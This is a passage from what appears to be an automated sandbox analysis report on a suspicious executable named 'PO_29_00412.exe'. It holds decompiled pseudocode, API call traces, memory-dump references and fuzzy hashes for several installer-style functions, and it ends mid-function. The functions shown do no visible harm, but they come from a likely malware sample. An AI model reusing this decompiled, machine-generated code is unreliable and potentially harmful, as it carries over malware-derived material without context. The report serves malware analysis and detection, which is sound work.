						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423f40, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x424748;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                            0x0040100a
                                                                            0x00401039
                                                                            0x00401047
                                                                            0x0040104d
                                                                            0x00401051
                                                                            0x0040105b
                                                                            0x00401061
                                                                            0x00401064
                                                                            0x004010f3
                                                                            0x00401089
                                                                            0x0040108c
                                                                            0x004010a6
                                                                            0x004010bd
                                                                            0x004010cc
                                                                            0x004010cf
                                                                            0x004010d5
                                                                            0x004010d9
                                                                            0x004010e4
                                                                            0x004010ed
                                                                            0x004010ef
                                                                            0x004010ef
                                                                            0x00401100
                                                                            0x00401105
                                                                            0x0040110d
                                                                            0x00401110
                                                                            0x00401112
                                                                            0x00401118
                                                                            0x0040111f
                                                                            0x00401126
                                                                            0x00401130
                                                                            0x00401142
                                                                            0x00401156
                                                                            0x00401160
                                                                            0x00401165
                                                                            0x00401165
                                                                            0x00401110
                                                                            0x0040116e
                                                                            0x00000000
                                                                            0x00401178
                                                                            0x00401010
                                                                            0x00401013
                                                                            0x00401015
                                                                            0x0040101f
                                                                            0x0040101f
                                                                            0x00000000

                                                                            APIs
                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32 ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextA.USER32(00000000,00423F40,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                                                            • Instruction ID: db002e3ba225c6bd58a8671fff368fb1669b339ad4166f4ebb51648b269c9ea2
                                                                            • Opcode Fuzzy Hash: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                                                            • Instruction Fuzzy Hash: 51419D71800249AFCF058FA5DE459AF7FB9FF45314F00802AF991AA1A0C738DA55DFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004062BB, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 72%
                                                                            			E004062BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x423f1c; // 0x71ad46
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x424798;
				_t39 = 0x4236e0;
				_t90 = 0x4236e0;
				if(_a4 >= 0x4236e0 && _a4 - 0x4236e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4236e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x425000;
							E00406228(_t90, (_t97 << 0xa) + 0x425000);
						} else {
							E00406186(_t90,  *0x424748);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406503(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42474c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4247e4;
						if( *0x4247e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x424744;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x424748,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x424748,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E0040610F((_t80 & 0x0000003f) +  *0x424798, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424798, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062BB(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00406228(_a4, _t39);
			}



























                                                                            0x004062bb
                                                                            0x004062bb
                                                                            0x004062bb
                                                                            0x004062c1
                                                                            0x004062c6
                                                                            0x004062c8
                                                                            0x004062d7
                                                                            0x004062d7
                                                                            0x004062df
                                                                            0x004062e0
                                                                            0x004062e1
                                                                            0x004062e2
                                                                            0x004062e5
                                                                            0x004062ed
                                                                            0x004062ef
                                                                            0x00406306
                                                                            0x00406309
                                                                            0x00406309
                                                                            0x004064e0
                                                                            0x004064e0
                                                                            0x004064e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406316
                                                                            0x0040631c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406322
                                                                            0x00406323
                                                                            0x00406326
                                                                            0x00406329
                                                                            0x004064d3
                                                                            0x004064dd
                                                                            0x004064df
                                                                            0x004064df
                                                                            0x004064d5
                                                                            0x004064d7
                                                                            0x004064d9
                                                                            0x004064da
                                                                            0x004064da
                                                                            0x00000000
                                                                            0x004064d3
                                                                            0x0040632f
                                                                            0x00406333
                                                                            0x00406343
                                                                            0x0040634a
                                                                            0x0040634d
                                                                            0x00406355
                                                                            0x00406358
                                                                            0x0040635f
                                                                            0x00406360
                                                                            0x00406363
                                                                            0x00406480
                                                                            0x00406483
                                                                            0x004064b3
                                                                            0x004064b6
                                                                            0x004064bb
                                                                            0x004064bf
                                                                            0x004064bf
                                                                            0x004064c4
                                                                            0x004064ca
                                                                            0x004064cc
                                                                            0x00000000
                                                                            0x004064cc
                                                                            0x00406485
                                                                            0x00406488
                                                                            0x0040649d
                                                                            0x004064a4
                                                                            0x0040648a
                                                                            0x00406491
                                                                            0x00406491
                                                                            0x004064ac
                                                                            0x004064af
                                                                            0x00406478
                                                                            0x00406479
                                                                            0x00406479
                                                                            0x00000000
                                                                            0x004064af
                                                                            0x00406369
                                                                            0x00406370
                                                                            0x00406372
                                                                            0x00406373
                                                                            0x0040638d
                                                                            0x0040638d
                                                                            0x00406394
                                                                            0x00406394
                                                                            0x0040639b
                                                                            0x0040639f
                                                                            0x0040639f
                                                                            0x004063a0
                                                                            0x004063a2
                                                                            0x004063db
                                                                            0x004063de
                                                                            0x004063ee
                                                                            0x004063f1
                                                                            0x004063f9
                                                                            0x004063ff
                                                                            0x004063ff
                                                                            0x0040645e
                                                                            0x0040645e
                                                                            0x00406460
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406403
                                                                            0x0040640a
                                                                            0x0040640b
                                                                            0x0040640d
                                                                            0x00406427
                                                                            0x00406435
                                                                            0x0040643b
                                                                            0x0040643d
                                                                            0x0040645b
                                                                            0x0040645b
                                                                            0x0040645b
                                                                            0x00000000
                                                                            0x0040645b
                                                                            0x00406443
                                                                            0x0040644c
                                                                            0x0040644f
                                                                            0x00406455
                                                                            0x00406459
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406459
                                                                            0x0040640f
                                                                            0x00406412
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406421
                                                                            0x00406423
                                                                            0x00406425
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406425
                                                                            0x00000000
                                                                            0x0040645e
                                                                            0x004063e6
                                                                            0x00000000
                                                                            0x004063a4
                                                                            0x004063bf
                                                                            0x004063c4
                                                                            0x004063c7
                                                                            0x00406467
                                                                            0x00406467
                                                                            0x0040646b
                                                                            0x00406473
                                                                            0x00406473
                                                                            0x00000000
                                                                            0x0040646b
                                                                            0x004063d1
                                                                            0x00406462
                                                                            0x00406462
                                                                            0x00406465
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406465
                                                                            0x004063a2
                                                                            0x00406375
                                                                            0x00406379
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040637b
                                                                            0x0040637f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406381
                                                                            0x00406385
                                                                            0x00000000
                                                                            0x00406387
                                                                            0x00406387
                                                                            0x00000000
                                                                            0x00406387
                                                                            0x00406385
                                                                            0x004064ea
                                                                            0x004064f4
                                                                            0x00406500
                                                                            0x00406500
                                                                            0x00000000

                                                                            APIs
                                                                            • GetSystemDirectoryA.KERNEL32 ref: 004063E6
                                                                            • GetWindowsDirectoryA.KERNEL32(uvlcopdlxoed,00000400,?,00420530,00000000,00405387,00420530,00000000), ref: 004063F9
                                                                            • SHGetSpecialFolderLocation.SHELL32(00405387,00000000,?,00420530,00000000,00405387,00420530,00000000), ref: 00406435
                                                                            • SHGetPathFromIDListA.SHELL32(00000000,uvlcopdlxoed), ref: 00406443
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040644F
                                                                            • lstrcatA.KERNEL32(uvlcopdlxoed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                                            • lstrlenA.KERNEL32(uvlcopdlxoed,?,00420530,00000000,00405387,00420530,00000000,00000000,00000000,00000000), ref: 004064C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$uvlcopdlxoed
                                                                            • API String ID: 717251189-2520582795
                                                                            • Opcode ID: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                                                            • Instruction ID: f83f29d570338ae078c2f0a770e3e6ec7f31d765c13aaba4f9587f8cbfb2a84b
                                                                            • Opcode Fuzzy Hash: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                                                            • Instruction Fuzzy Hash: 22610071A00214AEDF209F64D984BBA3BA4EB55714F12413FE913BA2D1C37C8962CB5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406503, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00406503(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C2D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405BEB("*?|<>/\":", _t5))) == 0) {
							E00405D7C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                            0x00406505
                                                                            0x0040650d
                                                                            0x00406521
                                                                            0x00406521
                                                                            0x00406527
                                                                            0x00406534
                                                                            0x00406534
                                                                            0x00406535
                                                                            0x00406537
                                                                            0x0040653b
                                                                            0x0040653d
                                                                            0x00406546
                                                                            0x00406548
                                                                            0x00406562
                                                                            0x0040656a
                                                                            0x0040656a
                                                                            0x0040656f
                                                                            0x00406571
                                                                            0x00406573
                                                                            0x00406577
                                                                            0x00406578
                                                                            0x0040657b
                                                                            0x00406583
                                                                            0x00406585
                                                                            0x00406589
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040658f
                                                                            0x00406594
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406594
                                                                            0x00406599

                                                                            APIs
                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO_29_00412.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
                                                                            • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\PO_29_00412.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
                                                                            • CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406504
                                                                            • "C:\Users\user\Desktop\PO_29_00412.exe" , xrefs: 0040653F
                                                                            • *?|<>/":, xrefs: 0040654B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\PO_29_00412.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-3539638750
                                                                            • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                            • Instruction ID: ed4a40943fe5e2665a2a55f9ea129fd4e03433fedea2fb13391fe05f183277a3
                                                                            • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                            • Instruction Fuzzy Hash: 5511E26180479139EB3216386C44B77BFD84B577A0F19007FE9C2722CAD67C5C62826D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404313, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00404313(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                            0x00404325
                                                                            0x004043db
                                                                            0x00000000
                                                                            0x004043db
                                                                            0x00404336
                                                                            0x0040433a
                                                                            0x00000000
                                                                            0x00404354
                                                                            0x00404354
                                                                            0x0040435d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040435f
                                                                            0x0040436b
                                                                            0x0040436e
                                                                            0x0040436e
                                                                            0x00404374
                                                                            0x0040437a
                                                                            0x0040437a
                                                                            0x00404386
                                                                            0x0040438c
                                                                            0x00404393
                                                                            0x00404396
                                                                            0x00404399
                                                                            0x0040439b
                                                                            0x0040439b
                                                                            0x004043a3
                                                                            0x004043a9
                                                                            0x004043a9
                                                                            0x004043b3
                                                                            0x004043b8
                                                                            0x004043bb
                                                                            0x004043c0
                                                                            0x004043c3
                                                                            0x004043c3
                                                                            0x004043d3
                                                                            0x004043d3
                                                                            0x00000000
                                                                            0x004043d6

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                            • Instruction ID: 4ebf73092ad7484045a31fabae3cd442355fcbc25dfc518f848a7595e5b54366
                                                                            • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                            • Instruction Fuzzy Hash: 592165716007049BCB309F68E948B5BBBF8AF41710B05892EED96E26E0D774E814CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040534F, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040534F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423f24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424814;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062BB(0, _t39, 0x420530, 0x420530, _a4);
					}
					_t26 = lstrlenA(0x420530);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423f08, 0x420530);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x420530;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x420530)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x420530, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                            0x00405355
                                                                            0x00405361
                                                                            0x00405364
                                                                            0x0040536a
                                                                            0x00405376
                                                                            0x00405379
                                                                            0x0040537c
                                                                            0x00405382
                                                                            0x00405382
                                                                            0x00405388
                                                                            0x00405390
                                                                            0x00405393
                                                                            0x004053b0
                                                                            0x004053b4
                                                                            0x004053bd
                                                                            0x004053bd
                                                                            0x004053c7
                                                                            0x004053d0
                                                                            0x004053dc
                                                                            0x004053e3
                                                                            0x004053e7
                                                                            0x004053ea
                                                                            0x004053fd
                                                                            0x0040540b
                                                                            0x0040540b
                                                                            0x0040540f
                                                                            0x00405411
                                                                            0x00405414
                                                                            0x00000000
                                                                            0x00405414
                                                                            0x00405395
                                                                            0x0040539d
                                                                            0x004053a5
                                                                            0x004053ab
                                                                            0x00000000
                                                                            0x004053ab
                                                                            0x004053a5
                                                                            0x00405393
                                                                            0x0040541e

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                            • lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                            • lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                            • SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2531174081-0
                                                                            • Opcode ID: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                                                            • Instruction ID: d7aab4fbb83e072b647ad5d9ecd44a72e262910ab30c50883f082c619406a612
                                                                            • Opcode Fuzzy Hash: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                                                            • Instruction Fuzzy Hash: 54218171900118BBDB11AF95DD84ADEBFB9EF04354F14807AF944B6291C7788E918F98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41f904; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
